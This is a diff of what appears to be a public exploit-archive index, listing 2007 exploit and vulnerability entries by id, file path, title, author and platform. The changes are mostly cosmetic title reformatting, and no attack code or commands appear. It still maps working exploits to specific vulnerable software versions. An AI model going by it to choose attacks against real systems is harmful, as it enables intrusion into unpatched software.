4165,platforms/windows/local/4165.c,"WinPcap 4.0 NPF.SYS Privilege Elevation Vulnerability PoC Exploit",2007-07-10,"Mario Ballano BĂ¡rcena",windows,local,0 @@ -3817,7 +3817,7 @@ id,file,description,date,author,platform,type,port 4169,platforms/php/webapps/4169.txt,"FlashBB <= 1.1.8 (sendmsg.php) Remote File Inclusion Vulnerability",2007-07-10,Kw3[R]Ln,php,webapps,0 4170,platforms/windows/remote/4170.html,"Program Checker (sasatl.dll 1.5.0.531) Javascript Heap Spraying Exploit",2007-07-10,callAX,windows,remote,0 4171,platforms/php/webapps/4171.pl,"Mail Machine <= 3.989 Local File Inclusion Exploit",2007-07-10,"H4 / XPK",php,webapps,0 -4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 IPV6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0 +4172,platforms/linux/local/4172.c,"Linux Kernel < 2.6.20.2 - IPv6_Getsockopt_Sticky Memory Leak PoC",2007-07-10,dreyer,linux,local,0 4173,platforms/php/webapps/4173.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0 Command Execution Vuln",2007-07-11,jmp-esp,php,webapps,0 4174,platforms/php/webapps/4174.txt,"PsNews 1.1 (show.php newspath) Local File Inclusion Vulnerability",2007-07-12,irk4z,php,webapps,0 4175,platforms/multiple/dos/4175.php,"PHP 5.2.3 bz2 com_print_typeinfo() Denial of Service Exploit",2007-07-12,shinnai,multiple,dos,0 @@ -3830,7 +3830,7 @@ id,file,description,date,author,platform,type,port 4182,platforms/php/webapps/4182.txt,"CMScout <= 1.23 (index.php) Remote SQL Injection Vulnerability",2007-07-14,g00ns,php,webapps,0 4183,platforms/php/webapps/4183.txt,"eSyndiCat Directory Software Multiple SQL Injection Vulnerabilities",2007-07-14,d3v1l,php,webapps,0 4184,platforms/php/webapps/4184.txt,"Realtor 747 (index.php categoryid) Remote SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 -4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 +4185,platforms/php/webapps/4185.txt,"Prozilla Directory Script (directory.php cat_id) SQL Injection Vulnerbility",2007-07-14,t0pP8uZz,php,webapps,0 4186,platforms/php/webapps/4186.txt,"paFileDB 3.6 (search.php) Remote SQL Injection Vulnerability",2007-07-14,pUm,php,webapps,0 4187,platforms/php/webapps/4187.txt,"Traffic Stats (referralUrl.php offset) Remote SQL Injection Vulnerbility",2007-07-16,t0pP8uZz,php,webapps,0 4188,platforms/windows/remote/4188.txt,"Flash Player/Plugin Video file parsing Remote Code Execution POC",2007-07-16,yunshu,windows,remote,0 @@ -3839,7 +3839,7 @@ id,file,description,date,author,platform,type,port 4191,platforms/php/webapps/4191.txt,"Pictures Rating (index.php msgid) Remote SQL Injection Vulnerbility",2007-07-18,t0pP8uZz,php,webapps,0 4192,platforms/php/webapps/4192.htm,"Vivvo CMS <= 3.4 (index.php) Remote BLIND SQL Injection Exploit",2007-07-18,ajann,php,webapps,0 4193,platforms/php/webapps/4193.txt,"QuickEStore <= 8.2 (insertorder.cfm) Remote SQL Injection Vulnerability",2007-07-18,meoconx,php,webapps,0 -4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 Remote File Upload Vulnerability",2007-07-18,"Cold Zero",php,webapps,0 +4194,platforms/php/webapps/4194.txt,"Joomla Component Expose <= RC35 Remote File Upload Vulnerability",2007-07-18,"Cold Zero",php,webapps,0 4195,platforms/php/webapps/4195.txt,"BBS E-Market (postscript.php p_mode) Remote File Inclusion Vulnerability",2007-07-18,mozi,php,webapps,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4197,platforms/php/webapps/4197.txt,"phpBB Module SupaNav 1.0.0 (link_main.php) RFI Vulnerability",2007-07-18,bd0rk,php,webapps,0 @@ -3863,7 +3863,7 @@ id,file,description,date,author,platform,type,port 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha Post Request Remote Buffer Overflow Exploit",2007-07-23,deusconstruct,linux,dos,0 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 -4219,platforms/php/webapps/4219.txt,"Confixx Pro <= 3.3.1 (saveserver.php) Remote File Inclusion Vulnerability",2007-07-24,"H4 / XPK",php,webapps,0 +4219,platforms/php/webapps/4219.txt,"Confixx Pro <= 3.3.1 - (saveserver.php) Remote File Inclusion Vulnerability",2007-07-24,"H4 / XPK",php,webapps,0 4220,platforms/php/webapps/4220.pl,"Entertainment CMS (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory (index.php page) Remote File Inclusion Vulnerability",2007-07-24,mozi,php,webapps,0 4222,platforms/windows/remote/4222.c,"Windows RSH daemon 1.7 Remote Buffer Overflow Exploit",2007-07-24,"Joey Mengele",windows,remote,514 @@ -3873,13 +3873,13 @@ id,file,description,date,author,platform,type,port 4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 -4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 Playlist Crafted mls File Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 +4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 -4235,platforms/php/webapps/4235.txt,"Seditio CMS <= v121 (pfs.php) Remote File Upload Vulnerability",2007-07-27,A.D.T,php,webapps,0 +4235,platforms/php/webapps/4235.txt,"Seditio CMS <= 121 - (pfs.php) Remote File Upload Vulnerability",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x (win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) Remote SQL Injection Vulnerability",2007-07-27,t0pP8uZz,php,webapps,0 @@ -3934,7 +3934,7 @@ id,file,description,date,author,platform,type,port 4287,platforms/windows/remote/4287.py,"SurgeMail 38k (SEARCH) Remote Buffer Overflow Exploit",2007-08-14,"Joey Mengele",windows,remote,143 4288,platforms/windows/dos/4288.c,"WireShark < 0.99.6 MMS Remote Denial of Service Exploit",2007-08-14,ZwelL,windows,dos,0 4289,platforms/windows/dos/4289.php,"Easy Chat Server 2.2 Remote Denial of Service Exploit",2007-08-14,NetJackal,windows,dos,0 -4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 +4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 (php_win32sti) Local Buffer Overflow PoC (win32)",2007-08-18,boecke,windows,dos,0 @@ -3943,7 +3943,7 @@ id,file,description,date,author,platform,type,port 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 Remote SQL Injection Vulnerability",2007-08-20,k1tk4t,php,webapps,0 4297,platforms/hardware/dos/4297.pl,"Cisco IP Phone 7940 (3 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 4298,platforms/hardware/dos/4298.pl,"Cisco IP Phone 7940 (10 SIP messages) Remote Denial of Service Exploit",2007-08-21,MADYNES,hardware,dos,0 -4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit",2007-08-21,rgod,windows,remote,0 +4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BOF Exploit",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 (category_id) Remote SQL Injection Vulnerability",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 @@ -3960,24 +3960,24 @@ id,file,description,date,author,platform,type,port 4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0 4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0 4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389 -4316,platforms/windows/remote/4316.cpp,"Mercury/32 v3.32-v4.51 SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 -4317,platforms/php/webapps/4317.txt,"2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability",2007-08-26,bd0rk,php,webapps,0 +4316,platforms/windows/remote/4316.cpp,"Mercury/32 3.32-4.51 - SMTP Pre-Auth EIP Overwrite Exploit",2007-08-26,Heretic2,windows,remote,25 +4317,platforms/php/webapps/4317.txt,"2532/Gigs 1.2.1 - (activateuser.php) Local File Inclusion Vulnerability",2007-08-26,bd0rk,php,webapps,0 4318,platforms/windows/dos/4318.php,"PHP <= 5.2.0 (php_iisfunc.dll) Local Buffer Overflow PoC (win32)",2007-08-27,boecke,windows,dos,0 4319,platforms/hardware/dos/4319.pl,"Thomson SIP phone ST 2030 Remote Denial of Service Exploit",2007-08-27,MADYNES,hardware,dos,0 4320,platforms/php/webapps/4320.txt,"SomeryC <= 0.2.4 (include.php skindir) Remote File Inclusion Vulnerability",2007-08-27,Katatafish,php,webapps,0 -4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final MODE Remote Heap Overflow Exploit (0-day)",2007-08-27,bannedit,linux,remote,0 +4321,platforms/linux/remote/4321.rb,"BitchX 1.1 Final - MODE Remote Heap Overflow Exploit (0day)",2007-08-27,bannedit,linux,remote,0 4322,platforms/windows/remote/4322.html,"NVR SP2 2.0 (nvUnifiedControl.dll v. 1.1.45.0)SetText() Remote Exploit",2007-08-28,shinnai,windows,remote,0 4323,platforms/windows/remote/4323.html,"NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) SaveXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 4324,platforms/windows/remote/4324.html,"NVR SP2 2.0 (nvUtility.dll v. 1.0.14.0) DeleteXMLFile() Inscure Method",2007-08-27,shinnai,windows,remote,0 4325,platforms/windows/local/4325.php,"XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit",2007-08-27,Inphex,windows,local,0 4326,platforms/php/webapps/4326.txt,"Arcadem 2.01 Remote SQL Injection / RFI Vulnerabilties",2007-08-27,SmOk3,php,webapps,0 -4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt v1 (show) Remote SQL Injection Vulnerability",2007-08-27,D4m14n,php,webapps,0 -4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 +4327,platforms/php/webapps/4327.txt,"WBB2-Addon: Acrotxt 1.0 - (show) Remote SQL Injection Vulnerability",2007-08-27,D4m14n,php,webapps,0 +4328,platforms/windows/remote/4328.html,"Postcast Server Pro 3.0.61 / Quiksoft EasyMail (emsmtp.dll 6.0.1) BoF",2007-08-28,rgod,windows,remote,0 4329,platforms/php/webapps/4329.txt,"Micro CMS 3.5 (revert-content.php) Remote SQL Injection Vulnerability",2007-08-28,"not sec group",php,webapps,0 4330,platforms/php/webapps/4330.txt,"ACG News 1.0 (aid/catid) Remote SQL Injection Vulnerabilities",2007-08-28,SmOk3,php,webapps,0 4331,platforms/php/webapps/4331.pl,"DL PayCart 1.01 (viewitem.php ItemID) Blind SQL Injection Exploit",2007-08-28,irvian,php,webapps,0 -4332,platforms/php/webapps/4332.txt,"VWar <= v1.5.0 R15 (mvcw.php) Remote File Inclusion Vulnerability",2007-08-28,DNX,php,webapps,0 -4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan <= 4.2.0 (mvcw_conver.php) RFI Vulnerability",2007-08-28,DNX,php,webapps,0 +4332,platforms/php/webapps/4332.txt,"VWar <= 1.5.0 R15 - (mvcw.php) Remote File Inclusion Vulnerability",2007-08-28,DNX,php,webapps,0 +4333,platforms/php/webapps/4333.txt,"PHPNuke-Clan <= 4.2.0 - (mvcw_conver.php) RFI Vulnerability",2007-08-28,DNX,php,webapps,0 4334,platforms/windows/remote/4334.txt,"MSN messenger 7.x (8.0?) VIDEO Remote Heap Overflow Exploit",2007-08-29,wushi,windows,remote,0 4335,platforms/windows/dos/4335.txt,"Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit",2007-08-29,wushi,windows,dos,0 4336,platforms/php/webapps/4336.txt,"xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability",2007-08-29,DarkFuneral,php,webapps,0 @@ -4004,7 +4004,7 @@ id,file,description,date,author,platform,type,port 4357,platforms/windows/remote/4357.html,"Telecom Italy Alice Messenger Remote registry key manipulation Exploit",2007-09-03,rgod,windows,remote,0 4358,platforms/php/webapps/4358.txt,"STPHPLibrary (STPHPLIB_DIR) Remote File Inclusion Vulnerability",2007-09-03,leetsecurity,php,webapps,0 4359,platforms/multiple/dos/4359.txt,"Apple Quicktime < 7.2 SMIL Remote Integer Overflow PoC",2007-09-03,"David Vaartjes",multiple,dos,0 -4360,platforms/windows/remote/4360.rb,"CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)",2007-09-03,"Patrick Webster",windows,remote,0 +4360,platforms/windows/remote/4360.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow Exploit (meta)",2007-09-03,"Patrick Webster",windows,remote,0 4361,platforms/windows/local/4361.pl,"Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit",2007-09-04,Koshi,windows,local,0 4362,platforms/linux/remote/4362.pl,"Web Oddity Web Server 0.09b Directory Transversal Exploit",2007-09-04,Katatafish,linux,remote,0 4363,platforms/php/webapps/4363.txt,"PHPOF <= 20040226 (DB_adodb.class.php) RFI Vulnerability",2007-09-04,"ThE TiGeR",php,webapps,0 @@ -4022,7 +4022,7 @@ id,file,description,date,author,platform,type,port 4375,platforms/windows/dos/4375.txt,"BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 Multiple Remote SQL Injection Vulnerabilities",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS <= 1.0/2.2 Remote File Inclusion Vulnerabilities",2007-09-08,"ThE TiGeR",php,webapps,0 -4378,platforms/php/webapps/4378.htm,"fuzzylime cms <= 3.0 Local File Inclusion Vulnerability",2007-09-08,"not sec group",php,webapps,0 +4378,platforms/php/webapps/4378.htm,"fuzzylime cms <= 3.0 Local File Inclusion Vulnerability",2007-09-08,"not sec group",php,webapps,0 4379,platforms/windows/dos/4379.html,"Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF",2007-09-08,rgod,windows,dos,0 4380,platforms/php/webapps/4380.txt,"Sisfo Kampus 2006 (blanko.preview.php) Local File Disclosure Vuln",2007-09-08,QTRinux,php,webapps,0 4381,platforms/php/webapps/4381.txt,"Txx CMS 0.2 Multiple Remote File Inclusion Vulnerabilities",2007-09-08,"Nice Name Crew",php,webapps,0 @@ -4045,10 +4045,10 @@ id,file,description,date,author,platform,type,port 4398,platforms/windows/remote/4398.html,"Microsoft SQL Server Distributed Management Objects BoF Exploit",2007-09-12,96sysim,windows,remote,0 4399,platforms/multiple/remote/4399.html,"Apple Quicktime (Multiple Browsers) Command Execution PoC (0day)",2007-09-12,pdp,multiple,remote,0 4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 (id) Remote SQL Injection Vulnerability",2007-09-13,Houssamix,php,webapps,0 -4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio v5 Remote File Inclusion Vulnerability",2007-09-13,Morgan,php,webapps,0 +4401,platforms/php/webapps/4401.txt,"Joomla Component joomlaradio 5.0 - Remote File Inclusion Vulnerability",2007-09-13,Morgan,php,webapps,0 4403,platforms/windows/dos/4403.py,"JetCast Server 2.0.0.4308 Remote Denial of Service Exploit",2007-09-13,vCore,windows,dos,0 4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 (skill_delete) Remote SQL Injection Vulnerability",2007-09-13,"Sumit Siddharth",php,webapps,0 -4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability",2007-09-14,"arfis project",php,webapps,0 +4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b (settings.inc.php approot) RFI Vulnerability",2007-09-14,"arfis project",php,webapps,0 4406,platforms/php/webapps/4406.txt,"phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities",2007-09-14,Dj7xpl,php,webapps,0 4407,platforms/php/webapps/4407.java,"PHP Webquest <= 2.5 (id_actividad) Remote SQL Injection Exploit",2007-09-14,D4real_TeaM,php,webapps,0 4408,platforms/php/webapps/4408.pl,"JBlog 1.0 (index.php id) Remote SQL Injection Exploit",2007-09-14,s4mi,php,webapps,0 @@ -4127,15 +4127,15 @@ id,file,description,date,author,platform,type,port 4481,platforms/php/webapps/4481.txt,"Poppawid 2.7 (form) Remote File Inclusion Vulnerability",2007-10-02,0in,php,webapps,0 4482,platforms/php/webapps/4482.txt,"Web Template Management System 1.3 Remote SQL Injection",2007-10-04,bius,php,webapps,0 4483,platforms/php/webapps/4483.txt,"Ossigeno CMS <= 2.2a3 (footer.php) Remote File Inclusion Vulnerability",2007-10-04,"Nice Name Crew",php,webapps,0 -4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 (HELP) Remote Buffer Overflow Exploit",2007-10-04,weak,windows,remote,0 -4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS <= 1.2rev9 Remote File Inclusion Vulnerability",2007-10-05,GoLd_M,php,webapps,0 +4484,platforms/windows/remote/4484.pl,"FSFDT v3.000 d9 - (HELP) Remote Buffer Overflow Exploit",2007-10-04,weak,windows,remote,0 +4485,platforms/php/webapps/4485.txt,"Trionic Cite CMS <= 1.2rev9 - Remote File Inclusion Vulnerability",2007-10-05,GoLd_M,php,webapps,0 4486,platforms/asp/webapps/4486.txt,"Furkan Tastan Blog Remote SQL Injection Vulnerability",2007-10-05,CyberGhost,asp,webapps,0 4487,platforms/windows/remote/4487.html,"Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion",2007-10-05,shinnai,windows,remote,0 4488,platforms/windows/remote/4488.html,"Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite",2007-10-05,shinnai,windows,remote,0 4489,platforms/php/webapps/4489.txt,"Joomla panoramic component 1.0 Remote File Inclusion Vulnerability",2007-10-06,NoGe,php,webapps,0 4490,platforms/php/webapps/4490.txt,"ELSE IF CMS 0.6 Multiple Remote Vulnerabilities / Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 4491,platforms/php/webapps/4491.php,"CMS Creamotion (securite.php) Remote File Inclusion Exploit",2007-10-06,"HACKERS PAL",php,webapps,0 -4492,platforms/php/webapps/4492.txt,"Picturesolution <= v2.1 (config.php path) Remote File Inclusion Vuln",2007-10-06,Mogatil,php,webapps,0 +4492,platforms/php/webapps/4492.txt,"Picturesolution <= 2.1 - (config.php path) Remote File Inclusion Vuln",2007-10-06,Mogatil,php,webapps,0 4493,platforms/php/webapps/4493.txt,"SkaDate Online 5.0/6.0 Remote File Disclosure Vulnerability",2007-10-06,SnIpEr_SA,php,webapps,0 4494,platforms/php/webapps/4494.txt,"Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability",2007-10-07,TEAMELITE,php,webapps,0 4495,platforms/php/webapps/4495.txt,"idmos-phoenix cms (aural.php) Remote File Inclusion Vulnerability",2007-10-07,"HACKERS PAL",php,webapps,0 @@ -4180,7 +4180,7 @@ id,file,description,date,author,platform,type,port 4534,platforms/linux/remote/4534.c,"eXtremail <= 2.1.1 PLAIN authentication Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,143 4535,platforms/linux/dos/4535.pl,"eXtremail <= 2.1.1 Remote Heap Overflow PoC",2007-10-15,mu-b,linux,dos,0 4536,platforms/php/webapps/4536.txt,"doop CMS <= 1.3.7 (page) Local File Inclusion Vulnerability",2007-10-15,vladii,php,webapps,0 -4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 Remote Buffer Overflow Exploit",2005-05-03,greuff,linux,remote,0 +4537,platforms/linux/remote/4537.c,"Subversion 0.3.7/1.0.0 - Remote Buffer Overflow Exploit",2005-05-03,greuff,linux,remote,0 4538,platforms/php/webapps/4538.txt,"Artmedic CMS <= 3.4 (index.php page) Local File Inclusion Vulnerability",2007-10-16,iNs,php,webapps,0 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 Remote SQL Injection Vulnerability",2007-10-16,dumenci,php,webapps,0 4540,platforms/multiple/dos/4540.pl,"GCALDaemon <= 1.0-beta13 Remote Denial of Service Exploit",2007-10-16,ikki,multiple,dos,0 @@ -4233,7 +4233,7 @@ id,file,description,date,author,platform,type,port 4587,platforms/php/webapps/4587.txt,"miniBB 2.1 (table) Remote SQL Injection Vulnerability",2007-10-30,irk4z,php,webapps,0 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 (dir_ws) Remote File Inclusion Vulnerability",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 -4591,platforms/php/webapps/4591.txt,"ModuleBuilder V1.0 (file) Remote File Disclosure Vulnerability",2007-10-31,GoLd_M,php,webapps,0 +4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure Vulnerability",2007-10-31,GoLd_M,php,webapps,0 4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 download.php Remote File Disclosure Vulnerability",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability",2007-11-01,S.W.A.T.,php,webapps,0 4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 @@ -4283,7 +4283,7 @@ id,file,description,date,author,platform,type,port 4638,platforms/php/webapps/4638.txt,"SkyPortal vRC6 Multiple Remote Vulnerabilities",2007-11-20,BugReport.IR,php,webapps,0 4639,platforms/php/webapps/4639.htm,"Ucms <= 1.8 Backdoor Remote Command Execution Exploit",2007-11-21,D4m14n,php,webapps,0 4640,platforms/php/webapps/4640.txt,"TalkBack 2.2.7 Multiple Remote File Inclusion Vulnerabilities",2007-11-21,NoGe,php,webapps,0 -4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 +4641,platforms/php/webapps/4641.txt,"alstrasoft E-Friends <= 4.98 (seid) Multiple SQL Injection Vulnerabilities",2007-11-21,K-159,php,webapps,0 4642,platforms/php/webapps/4642.txt,"DevMass Shopping Cart <= 1.0 Remote File Include Vulnerability",2007-11-22,S.W.A.T.,php,webapps,0 4643,platforms/php/webapps/4643.py,"VigileCMS <= 1.8 Stealth Remote Command Execution Exploit",2007-11-22,The:Paradox,php,webapps,0 4644,platforms/asp/webapps/4644.txt,"NetAuctionHelp 4.1 (nsearch) Remote SQL Injection Vulnerability",2007-11-22,"Aria-Security Team",asp,webapps,0 @@ -4338,7 +4338,7 @@ id,file,description,date,author,platform,type,port 4693,platforms/php/webapps/4693.txt,"SineCMS <= 2.3.4 Calendar Remote SQL Injection Vulnerability",2007-12-05,KiNgOfThEwOrLd,php,webapps,0 4694,platforms/php/webapps/4694.txt,"ezContents 1.4.5 (index.php link) Remote File Disclosure Vulnerability",2007-12-05,p4imi0,php,webapps,0 4695,platforms/php/webapps/4695.txt,"Wordpress Plugin PictPress <= 0.91 Remote File Disclosure Vulnerability",2007-12-05,GoLd_M,php,webapps,0 -4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 +4696,platforms/php/webapps/4696.txt,"SerWeb <= 2.0.0 dev1 2007-02-20 - Multiple RFI / LFI Vulnerabilities",2007-12-06,GoLd_M,php,webapps,0 4697,platforms/asp/webapps/4697.txt,"MWOpen E-Commerce leggi_commenti.asp Remote SQL Injection",2007-12-06,KiNgOfThEwOrLd,asp,webapps,0 4698,platforms/linux/local/4698.c,"Send ICMP Nasty Garbage (sing) Append File Logrotate Exploit",2007-12-06,bannedit,linux,local,0 4699,platforms/windows/remote/4699.txt,"Firefly Media Server (mt-daapd) 2.4.1 / SVN 1699 Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0 @@ -4394,9 +4394,9 @@ id,file,description,date,author,platform,type,port 4749,platforms/windows/local/4749.c,"Rosoft Media Player <= 4.1.7 .M3U Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x (search.php type) Remote SQL Injection Vulnerability",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 -4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 +4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g logurl() Remote Buffer Overflow Exploit (win32) (pl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 -4755,platforms/php/webapps/4755.txt,"PhpMyDesktop|arcade 1.0 Final (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 +4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) RFI Vulnerability",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 BLUETOOTH Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 4757,platforms/windows/dos/4757.txt,"HP Software Update client 3.0.8.4 Multiple Remote Vulnerabilities",2007-12-19,porkythepig,windows,dos,0 4758,platforms/php/webapps/4758.txt,"xeCMS 1.x (view.php list) Remote File Disclosure Vulnerability",2007-12-19,p4imi0,php,webapps,0 @@ -4414,7 +4414,7 @@ id,file,description,date,author,platform,type,port 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 (category.php) Remote SQL Injection Vulnerability",2007-12-22,Koller,php,webapps,0 4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 Multiple Remote SQL Injection Vulnerabilities",2007-12-22,MhZ91,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 Remote SQL Injection Vulnerability",2007-12-22,Houssamix,php,webapps,0 -4773,platforms/multiple/dos/4773.pl,"OpenSSL < 0.9.7l / 0.9.8d SSLv2 Client Crash Exploit",2007-12-23,"Noam Rathaus",multiple,dos,0 